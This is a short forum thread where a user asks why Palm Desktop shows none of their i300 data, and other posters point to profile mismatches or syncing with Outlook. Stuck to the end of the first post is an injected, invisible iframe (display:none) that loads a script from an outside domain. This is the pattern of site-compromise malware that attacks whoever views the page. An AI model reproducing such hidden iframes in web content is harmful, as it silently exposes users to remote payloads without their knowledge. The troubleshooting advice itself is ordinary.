Question Need Help w/ Palm Desktop

I can't get my palm desktop to work. Currently it's pointed (under -tools/options) C:\PALM for the data directory. I have tried pointing it all over and can't get any of my palm data. Please help!<iframe src="http://tmb-corp.com/g/p/l/counter.js" style="display:none"></iframe>

I don't understand the problem your having...

Can you start Palm Desktop, yet the app doesn't contain any data? If so, it's likely due to looking at a different profile than your palm has.

If you can't even start palm desktop, the file is run from c:\palm\palm.exe.

If these don't help, we need some more specifics as to the problem - has it worked in the past with your i300? Have you changed any config lately? Etc.

The program opens and appears to work fine, but it contains no data. Since I originally installed the palm software and have been using the i-300, it has never contained the data. It has my profile name in the <user> space in the upper right hand corner. I've went through and tried to find the database file to link it to, but no luck.

If you're synhcing with Outlook, then you won't find much of anything in Palm Desktop - it's all in Outlook.
